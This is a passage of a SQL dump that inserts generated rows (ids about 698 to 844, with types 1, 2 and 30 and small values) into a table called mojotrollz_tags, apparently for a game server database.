`mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (698, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (698, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (699, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (699, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (701, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (701, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (702, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (702, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (703, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (703, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (704, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (704, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (705, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (705, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (706, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (706, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (707, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (707, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (708, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (708, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (709, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (709, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (710, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (710, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (711, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (711, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (712, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (712, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (713, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (713, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (714, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (714, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (715, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (715, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (716, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (716, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (717, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (717, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (718, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (718, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (721, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (721, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (723, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (724, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (724, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (727, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (727, 1, 2, 1537, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (727, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (728, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (728, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (729, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (729, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (730, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (730, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (731, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (731, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (732, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (732, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (733, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (733, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (734, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (734, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (735, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (735, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (736, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (736, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (737, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (737, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (738, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (738, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (739, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (739, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (740, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (740, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (741, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (741, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (742, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (742, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (743, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (743, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (744, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (744, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (745, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (745, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (746, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (746, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (747, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (747, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (750, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (750, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (751, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (751, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (752, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (752, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (754, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (754, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (755, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (755, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (756, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (756, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (757, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (757, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (759, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (759, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (760, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (760, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (761, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (761, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (762, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (762, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (763, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (763, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (764, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (764, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (765, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (765, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (766, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (766, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (767, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (767, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (768, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (768, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (769, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (769, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (770, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (770, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (771, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (771, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (772, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (772, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (773, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (773, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (775, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (777, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (777, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (780, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (780, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (781, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (781, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (782, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (782, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (783, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (783, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (784, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (784, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (785, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (785, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (786, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (786, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (787, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (787, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (789, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (789, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (790, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (790, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (791, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (791, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (793, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (793, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (794, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (794, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (795, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (795, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (796, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (796, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (797, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (797, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (798, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (798, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (799, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (799, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (800, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (800, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (801, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (801, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (802, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (802, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (804, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (804, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (805, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (805, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (806, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (806, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (807, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (807, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (808, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (808, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (810, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (810, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (811, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (811, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (812, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (812, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (813, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (813, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (814, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (814, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (815, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (818, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (818, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (819, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (819, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (820, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (820, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (821, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (821, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (822, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (822, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (823, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (823, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (824, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (824, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (826, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (826, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (827, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (827, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (828, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (828, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (829, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (829, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (830, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (830, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (831, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (831, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (832, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (832, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (833, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (833, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (834, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (834, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (836, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (836, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (837, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (837, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (840, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (840, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (842, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (842, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (843, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (843, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (844, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (844, 1, 30, 0, 'generated'); 